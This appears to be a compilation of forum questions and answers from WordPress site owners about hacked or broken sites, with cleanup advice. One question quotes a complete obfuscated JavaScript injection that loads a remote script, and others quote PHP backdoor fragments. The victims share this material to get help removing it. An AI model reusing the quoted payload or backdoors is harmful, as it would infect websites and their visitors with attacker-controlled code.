The whole wordpress website got RESET - wordpress
My wordpress blog was working perfectly fine, until one day when suddenly my blog got down. All I could see was a blank white page. I still don't know the reason.
But initially, I was able to figure out the Debug messages, which were some compatibility issues between prototype of function Walker() and some theme function extending Walker(). So, I somehow managed to resolve those issues, by changing the theme function prototype.
But still, I could only view a blank page without any error. Then, I went through my child theme files and I found that there was some PHP code written to upload image file in child "style.css". Fortunately, I had backup of my Blog so I restored my child style.css.
After so many efforts, I still couldn't restore my complete Blog.
Although, All the posts and everything is there in DB, but I can't see any post on my Blog and Admin panel. It seems that my created categories are no longer there in Admin panel, when I restored theme.
Can anyone please help me to find out...
Why it happened and How my blog got reset ?
How can I restore my blog and reflect all my posts from DB to Admin-panel & Blog ?
It looks like somebody hacked you up. And, edited some files on your server.
Wordpress, actually doesn't offer any backup features. But, most of the web hosting services have a usual backup option. So, you might consider that.
Or, if your Wordpress database is right in place, as before, then you the possible error is that your Wordpress core files are corrupted or edited by anyone. So, you might consider, deleting your Wordpress and reinstalling it, (without deleting your databases). This would not affect your blog at all, because all Wordpress information is stored in the databases. But, remember to backup the files of wp-content folder and copy them to your new installation.
Related
My wordpress website being hacked with code eval($_SERVER['HTTP_81DB2B3']
I have a problem with my website, I get information from wordfence about my WordPress website getting hacked enter image description here add found a code eval($_SERVER['HTTP_81DB2B3'] so i removed it but in a few second the code going back. someone, please help me
I had something very similar to this. Go to your cPanel and search for "Cron Jobs" and scroll down to see if there's any malicious cronjobs setup. You might have some that look like eval(gzinflate(base64_decode(.... that are essentially causing this to reoccur. Not a complete fix to this issue, but you'll have to delete those cronjobs to ensure that that line of code doesn't keep reappearing. In addition to that, you'll also need to make sure those cronjobs don't show up again. Use a plugin like Wordfence (suggested above as well) to look for malicious files and if it helps replace your home directory (except for wp-content and wp-config) with fresh files.
If your website got hacked then I guess more than 1 file was affected by it, case-1: If you are able to access the Wordpress Backend In this case, if you are able to access the Wordpress backend then I suggest you Step-1: Add one plugin called (Wordfence Security – Firewall & Malware Scan ) and scan your website with it. Step-2: After scanning the site remove all suspicious code from the site. Case 2: If you are not able to access the Wordpress backend then you have to update your Wordpress manually with the hosting file manager or FTP. Please Note: Please take a backup of your website before do any changes.
Wordpress doesn't display PAGES link on Dashboard
I have had this site since 2014 and have been updating regularly. All of a sudden, there is no link on the dashboard to access existing pages. They are there (viewable), but there appears to be no way to edit existing pages or to add new pages. Where did the expected link go, and how do I get it back?
I would suggest re-uploading all the Wordpress core files. I suspect some file is missing or corrupt. Make sure that all of your file permissions are correct (FTP/SSH). It is a good idea to disable plugins one by one and switch to a default theme as well and see if the Pages menu item appears in your Wordpress administration. You can find the culprit this way. PS. Backup the site prior to re-uploading the files.
How does a virus infect my WordPress site?
For the second time, I’m removing the Malware injection from posts on my WordPress site: <script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script> This code was inside every post. Using the plugin Better Search Replace, I deleted all found inserts from all posts. No inserts were found in other database tables. I checked the site for viruses using various plugins - such as Wordfence, etc. No infection results. Only I work with sites. My computer is well protected. Checked with different anti-virus scanners - everything is clean! I tried to find modified WordPress files as well as plugins. Purely! No suspicious files found! How to find the cause of infection?
There are 2 reasons why you are not able to remove jar.trafficbetter.biz malware from your WordPress site. you are using old, outdated nulled theme/child theme on your Wordpress site. the code was SQL injected to your database, and code is being populated on you site again and again. these are a clever piece of code and cannot be detected by any antivirus, if you want to know what the code is doing use the following link. https://blog.sucuri.net/2017/04/wordpress-security-unwanted-redirects-via-infected-javascript-files.html So to solve the problem, change or update your theme to the latest version. backup your database, and then search for the script in the database and remove the entry.
Wordpress Dashboard broken, displays “flashbacks” of comments/plugins/updates
I’m using the latest version of Wordpress (4.7.4). I have something very weird going on in my Dashboard. Not sure when this started. Can’t say for sure it started with the latest version of Wordpress or not. My Dashboard became completely useless. It’s like it’s showing me a flashback of a Dashboard from a few days or hours ago: Comments I’ve deleted in the Dashboard (hitting “trash”) are suddenly back there, awaiting my moderation. Plugins I’ve deactivated or even deleted are all back there and according to Dashboard still running (while in my FTP folder they’re certainly gone). The plugin page cannot be trusted anymore as it shows some plugins are activated that aren’t and vice versa. I have to check on my actual website to confirm which ones are running. Updates aren’t shown correctly. Once I’ve updated a plugin, a few minutes later it shows me again that there’s a new update. As you can tell it’s all pretty much the same phenomenon. It’s as if I’m seeing an older version of my Dashboard. Not sure what else is broken. The only other thing I noticed is that even on my actual blog I still see a comment. Blog post says “1 comment”, but the actual comment doesn’t show up. At first, this all sounds like a “cache problem”. But I’ve already turned off all caching: No caching plugin installed Turned off server caching via htaccess Disabled leverage browser caching Emptied my own browser cache Other things I tested: Turn off all plugins. Switch to the standard Wordpress theme “Twenty Twelve” I tried WP_DEBUG, but nothing related shows up. I researched the internet, but nobody has described a similar problem, so I suppose this is not a common Wordpress issue. The issue remains. Unfortunately I’m not a developer and don’t know too much about the Wordpress codex etc. But to me it sounds that the mistake is definitely not in the plugin or theme folder. The problem is that I’ve reached the point where I really cannot turn off plugins via Dashboard properly anymore. It’s so annyoing! My questions are: Is it safe to assume that this is related to the Wordpress core files? What files exactly are in “charge of” the Dashboard? Should I just try to re-download the newest Wordpress version and replace a few files (if so which ones)? Should I do a clean Wordpress re-install or would that be too drastic? Any other suggestions? EDIT: Additionally I tried now: I manually downloaded the newest version of Wordpress and did just as described on the Wordpress.org website. I manually replaced wp-admin, wp-include folders and all root files. The issue remains... The way my Dashboard is right now, I really can’t use it. Please advice!
I contacted my host service again. They just gave me the same line to insert into my .htaccess file and I told them I already tried it and it didn't work. I then showed them my .htaccess file and they deleted the whole part that concerned their server caching. Now server caching is completely off and everything works again. Still not sure why this previously never caused issues. In the end, it had nothing to do with Wordpress. I hope this answer will help people who run into similar problems.
Meta Description Shows Spam
I have website (thebyandby.com) that got hacked several weeks ago. The problem is, the description on Google is showing a spam description for viagra and one the most popular posts (when linked to from Google) goes to a spam website. The site is a WordPress website so I reinstalled the theme and made sure everything was updated. There are only two plugins installed, Akismet and Google Analytics. I don't think the plugins could be effected but I am not sure. The problem was still there so I checked when Google last indexed my site and it was after I had reinstalled my theme. I checked for malware from Google Webmaster and it said it didn't find any malware. I ran grep -r "viagra" on my entire web directory and nothing was found. I really don't know what else to do. Could this be a database problem?
Yes, it could well be that you have content in the database which is compromised. After all, that's where all the pages and posts are stored. Does your hosting company provide a tool like phpMyAdmin for browsing and editing the database? But equally, if you have only reinstalled the theme then there are a lot more core WordPress files that could have been compromised by the hacker. Given that you are having problems, it would be well worth doing a complete reinstall of the WordPress files. Just make sure you keep a copy of your wp-config file, as you will need to copy that back. Also make sure you reinstall the same version of WordPress that you currently have. But you know what: It may save you time in the long-run to just export all your posts and pages from within WordPress and then wipe the hacked site completely and install the whole thing from scratch. You can open the export file in any decent editor and once you've got your head around the XML structure, you can delete any rubbish that the hacker put there. I guess this option depends on how much content you had already put up on the site and how readily you could reconfigure the new site to match the old one. Of-course if you have a full files and database backup from before the hacker got there, then you have an easy option that avoids all this grief ;-)